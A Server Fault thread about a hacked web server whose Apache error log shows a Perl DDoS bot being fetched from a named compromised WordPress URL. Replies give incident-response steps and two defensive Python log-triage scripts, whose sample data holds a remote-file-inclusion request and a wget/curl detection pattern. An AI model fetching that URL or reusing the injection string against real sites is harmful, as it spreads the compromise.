
My provider informed me that there is an outbound attack coming from my web server. On further inspection I saw this in my Apache error.log file:

--2012-02-04 04:40:59--  http://www.luxelivingforum.com/wp-content/themes/lifestyle/run
Resolving www.luxelivingforum.com... 184.168.113.199
Connecting to www.luxelivingforum.com|184.168.113.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68338 (67K) [text/plain]
Saving to: `./run'

     0K .......... .......... .......... .......... .......... 74% 61.8K 0s
    50K .......... ......                                     100% 11.1M=0.8s

2012-02-04 04:41:01 (82.4 KB/s) - `./run' saved [68338/68338]
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 174.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 211.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 244.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 251.

What could the above thing mean?

Ladadadada
Proy

2 Answers


Your server must have been compromised and is now being remotely commanded to launch attacks. You should recover your last uncompromised backup and immediately patch your WordPress installation. You must monitor the security advisories for WordPress (and WordPress plugins) on a daily basis.

drcelus
  • The URL you see there is not my server. That appeared in my server's log file. Check this link to see how it shows in my web server logs: http://pastebin.com/CezEDf0v – Proy Feb 04 '12 at 09:58
  • Your server is downloading the file `http://www.luxelivingforum.com/wp-content/themes/lifestyle/run` and executing it. The file is a perl script encoded in base64. Your server is **hacked**. – drcelus Feb 04 '12 at 10:02
  • The bot code was pulled down from someone else's compromised Wordpress installation. The error log shows that Proy is running Python. – Ladadadada Feb 04 '12 at 10:03
  • Yes, correct. There are more than 30 web applications running on this server. The platforms covered are Django/php/perl. My server's access logs for each vhost are different, but the error logs are all pointing to the same one. Because of this I am not able to identify which web site is the one which has the faulty code. – Proy Feb 04 '12 at 10:08
  • If you run lots of different domains, adding `%{Host}i` to your LogFormat directive can be a very good idea. – Ladadadada Feb 04 '12 at 10:21
  • You should carefully scan your logs to find the vulnerable software. +1 for the logs directive tip. – drcelus Feb 04 '12 at 10:21
  • You know the exact timestamp: `04:40:59` so grep through all your access logs for that timestamp. You may have to grep a few seconds either side of that due to the way Apache logs timestamps. – Ladadadada Feb 04 '12 at 10:27
  • Any ideas on what the bot.pl is trying to do after connecting to IRC? – Proy Feb 04 '12 at 11:23
  • It receives targets to run DDoS against from an IRC channel. I haven't gone through all the code but it seems it can also download and execute random files. – drcelus Feb 04 '12 at 11:58
  • I'm not sure what else there is to do here. drcelus is right, your server is hacked. It doesn't matter which application has been compromised, you can't trust any of them at the moment. I'd flatten the server and restore from last known good backup. I realise that's not what you want to hear, but it's the only way to be certain. You could take an image of the system as it stands first if you wanted to continue analysing the hack, but I'd not hang about on fixing it. – Rob Moir Feb 04 '12 at 12:01
  • See also: http://serverfault.com/questions/218005/my-servers-been-hacked-emergency – Rob Moir Feb 04 '12 at 12:02
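The two tips in the comments above (put `%{Host}i` in the LogFormat so every line names its vhost, then grep all access logs for the error-log timestamp plus a few seconds either side) can be turned into one small correlation tool. The following is an added example written for this page, not code from the thread or from any of its participants. It assumes the access logs are in Apache's combined format, optionally prefixed by one extra Host field as the comment suggests, that the error-log clock and the access-log clock agree (the `when` argument is given as a timezone-aware datetime in UTC here), and that the `SUSPICIOUS` markers are a rough heuristic chosen for the example; the sample log lines are constructed and use documentation address ranges.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" LogFormat, optionally prefixed by one extra field holding
# %{Host}i (or %v) when the format was extended as the thread suggests.
# Both shapes parse; "vhost" is None for plain combined lines.
LINE_RE = re.compile(
    r'^(?:(?P<vhost>\S+) )?'                  # optional leading Host field
    r'(?P<client>\S+) \S+ \S+ '               # client address, ident, user
    r'\[(?P<time>[^\]]+)\] '                  # [04/Feb/2012:04:40:59 +0000]
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Heuristic, not a rule set (an assumption of this example): a URL or a
# shell-looking token inside the request line deserves a closer look.
SUSPICIOUS = re.compile(r'https?://|%3[bB]|%7[cC]|\bwget\b|\bcurl\b|[;|`]',
                        re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LINE_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], TIME_FMT)  # tz-aware
    return entry


def requests_near(lines, when, window_seconds=5):
    """Return parsed entries whose timestamp lies within +/- window_seconds of
    `when` (a tz-aware datetime), suspicious-looking requests first.  The
    window exists because Apache stamps the moment a request was received,
    while the wget transcript in error.log shows when the payload ran."""
    lo = when - timedelta(seconds=window_seconds)
    hi = when + timedelta(seconds=window_seconds)
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or not (lo <= entry["time"] <= hi):
            continue
        entry["suspicious"] = SUSPICIOUS.search(entry["request"]) is not None
        hits.append(entry)
    hits.sort(key=lambda e: (not e["suspicious"], e["time"]))
    return hits


# Constructed sample: three vhosts sharing one error log, as in the question.
# The second and fourth lines carry the extra Host field; the third does not,
# to show that a plain combined line still parses.
SAMPLE_ACCESS_LOG = """\
shop.example.test 203.0.113.7 - - [04/Feb/2012:04:40:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
blog.example.test 198.51.100.23 - - [04/Feb/2012:04:40:58 +0000] "GET /include.php?page=http://198.51.100.23/run HTTP/1.1" 200 312 "-" "libwww-perl/5.10"
10.0.0.5 - - [04/Feb/2012:04:40:57 +0000] "GET /status HTTP/1.1" 200 12
shop.example.test 203.0.113.9 - - [04/Feb/2012:04:41:03 +0000] "GET /images/logo.png HTTP/1.1" 200 8421 "http://shop.example.test/" "Mozilla/5.0"
wiki.example.test 192.0.2.44 - - [04/Feb/2012:04:41:10 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()


def correlate_sample():
    """Run the correlation against the constructed sample around the
    error-log timestamp from the question (2012-02-04 04:40:59)."""
    when = datetime(2012, 2, 4, 4, 40, 59, tzinfo=timezone.utc)
    return requests_near(SAMPLE_ACCESS_LOG, when)


if __name__ == "__main__":
    for e in correlate_sample():
        flag = "!!" if e["suspicious"] else "  "
        print(flag, e["time"].strftime("%H:%M:%S"), e["vhost"] or "-",
              e["client"], e["request"])
```

On a real server you would feed it the concatenation of every vhost's access log (`cat /var/log/apache2/*access*.log`) and the timestamp from the `--2012-02-04 04:40:59--` line; the point of sorting suspicious requests first is only to shorten the manual read, the whole window still deserves a look.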

That doesn't look like the sort of thing that should be in an Apache error log. Are you (or is your hosting provider) sending your logs through syslog?

In any case, you have a clear indication of a compromise here. The file in question is a bot of some sort (I haven't had time to analyse it myself yet) and is probably running on your system right now and attacking other people's systems.

Two things you should do straight away, even before the standard advice of "wipe everything, reinstall from backups", are to find the pid of the bot using `ps -ef | grep bot.pl` and then kill it using `kill -9 <the pid you found>`. You may also want to delete the bot code, which will be called `bot.pl`. You can probably find it with `locate bot.pl`.

The bot doesn't look particularly clever or sophisticated and doesn't seem to have done anything to hide its tracks. After killing it and deleting the bot code, you are probably clean. But you can never be sure once you have been compromised until you do the wipe-and-reinstall procedure.

The last thing you should do is to try and figure out how they got in so you can close the hole. If you do the wipe-and-install, make sure to keep a copy of all your logs for analysis later. The Apache access logs for the same time period should give you a hint as to what they did.

Ladadadada
  • Good news: if it can't connect to IRC, it won't do anything at all. As long as you have unknown outbound connections blocked at your firewall, you won't have attacked anyone else. You **do** have unknown outbound connections blocked, don't you? – Ladadadada Feb 04 '12 at 10:09
  • The bot code is a self-destructing one. If you open the link in a browser, towards the end the bot removes its files itself. My main problem is I need to identify my web site which has the faulty code. I suspect a PHP based website hosted on my server since PHP has always given me security issues. – Proy Feb 04 '12 at 10:13
  • His provider is warning that he has an ongoing outbound attack. – drcelus Feb 04 '12 at 10:13
  • A quick look at `bot.pl` shows that it is a one-trick pony. It does DDoS attacks and is controlled by IRC. – Ladadadada Feb 04 '12 at 10:15
  • Yes, I wrote that before I had actually uncompressed the tar file. It turns out that `bot.pl` is inside the `bot` directory and hence it does get deleted. – Ladadadada Feb 04 '12 at 10:17
  • The **big** problem here is what triggers the download of the bot. Maybe a vulnerable script installed somewhere on the server. The Apache logs must show something. – drcelus Feb 04 '12 at 10:19
  • I have verified all the outgoing ports that are allowed from the server. I have blocked everything that looks strange; only SMTP is now allowed out. Thanks Ladadadada. @drcelus I am now going to separate the error logs for all my web sites and see if the error shows up again. – Proy Feb 04 '12 at 10:24
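Ladadadada's opening point in the second answer, that a wget transcript and Perl interpreter warnings have no business in an Apache error log, is itself a detection rule: anything a CGI or PHP process writes to stderr lands in error.log, so the download transcript is the web server telling on the payload. The script below is an added example written for this page (not code from the thread or its participants) that scans error-log lines for exactly that pattern and pulls out the indicators worth searching the rest of the estate for. The regular expressions assume the wget transcript wording shown in the question; the function names `scan_error_log` and `indicators` are this example's own. The embedded excerpt is the question's own error.log fragment.

```python
import re
import sys

# wget's progress transcript, as it appears when a web-server-spawned process
# writes its stderr into Apache's error.log (wording as in the question).
WGET_START = re.compile(
    r'^--(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})--\s+(?P<url>\S+)')
WGET_RESOLVE = re.compile(r'^Resolving (?P<host>\S+?)\.\.\. (?P<ip>\S+)')
WGET_SAVE = re.compile(r"^Saving to: [`'](?P<path>[^']+)'")
WGET_DONE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \(.*?\) - "
    r"[`'](?P<path>[^']+)' saved \[(?P<got>\d+)/(?P<total>\d+)\]")
# A Perl interpreter complaining about a script it is currently running.
PERL_WARN = re.compile(r' at (?P<script>\S+\.pl) line (?P<line>\d+)\.$')


def scan_error_log(lines):
    """Walk error-log lines and return a triage summary:
       downloads    - one dict per wget transfer (timestamps, url, host,
                      resolved ip, local path, bytes, whether it completed)
       perl_scripts - {script path: number of interpreter warnings seen}"""
    downloads, perl_scripts = [], {}
    current = None
    for raw in lines:
        line = raw.rstrip("\n")
        m = WGET_START.match(line)
        if m:
            current = {"started": m["ts"], "url": m["url"], "host": None,
                       "ip": None, "path": None, "bytes": None,
                       "finished": None, "complete": False}
            continue
        if current is not None:
            m = WGET_RESOLVE.match(line)
            if m:
                current["host"], current["ip"] = m["host"], m["ip"]
                continue
            m = WGET_SAVE.match(line)
            if m:
                current["path"] = m["path"]
                continue
            m = WGET_DONE.match(line)
            if m:
                current["finished"] = m["ts"]
                current["path"] = m["path"]
                current["bytes"] = int(m["got"])
                current["complete"] = m["got"] == m["total"]
                downloads.append(current)
                current = None
                continue
        m = PERL_WARN.search(line)
        if m:
            perl_scripts[m["script"]] = perl_scripts.get(m["script"], 0) + 1
    if current is not None:      # transfer started but never reported done
        downloads.append(current)
    return {"downloads": downloads, "perl_scripts": perl_scripts}


def indicators(summary):
    """Flatten the summary into the strings worth searching other logs and
    hosts for: download URLs, hostnames, resolved addresses, dropped files,
    and the scripts the interpreter admitted to running."""
    found = set()
    for d in summary["downloads"]:
        found.update(v for v in (d["url"], d["host"], d["ip"], d["path"]) if v)
    found.update(summary["perl_scripts"])
    return sorted(found)


# The error.log fragment from the question, embedded so the script runs offline.
ERROR_LOG_EXCERPT = """\
--2012-02-04 04:40:59--  http://www.luxelivingforum.com/wp-content/themes/lifestyle/run
Resolving www.luxelivingforum.com... 184.168.113.199
Connecting to www.luxelivingforum.com|184.168.113.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68338 (67K) [text/plain]
Saving to: `./run'

     0K .......... .......... .......... .......... .......... 74% 61.8K 0s
    50K .......... ......                                     100% 11.1M=0.8s

2012-02-04 04:41:01 (82.4 KB/s) - `./run' saved [68338/68338]
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 174.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 211.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 244.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 251.
""".splitlines()


if __name__ == "__main__":
    # Pipe a real error.log on stdin; with no pipe, triage the excerpt above.
    source = sys.stdin if not sys.stdin.isatty() else ERROR_LOG_EXCERPT
    summary = scan_error_log(source)
    for d in summary["downloads"]:
        state = "complete" if d["complete"] else "INCOMPLETE"
        print(f"{d['started']} fetched {d['url']} ({d['ip']}) -> {d['path']} {state}")
    for script, n in summary["perl_scripts"].items():
        print(f"perl warnings from {script}: {n}")
    print("indicators:", ", ".join(indicators(summary)))
```

The `started` value is what you carry over to the access-log search, and the `path` value (`./run` here, relative to whatever the web server's working directory was) tells you which directory to image before wiping; an incomplete transfer is still worth recording, since the process that started it was already running on the box.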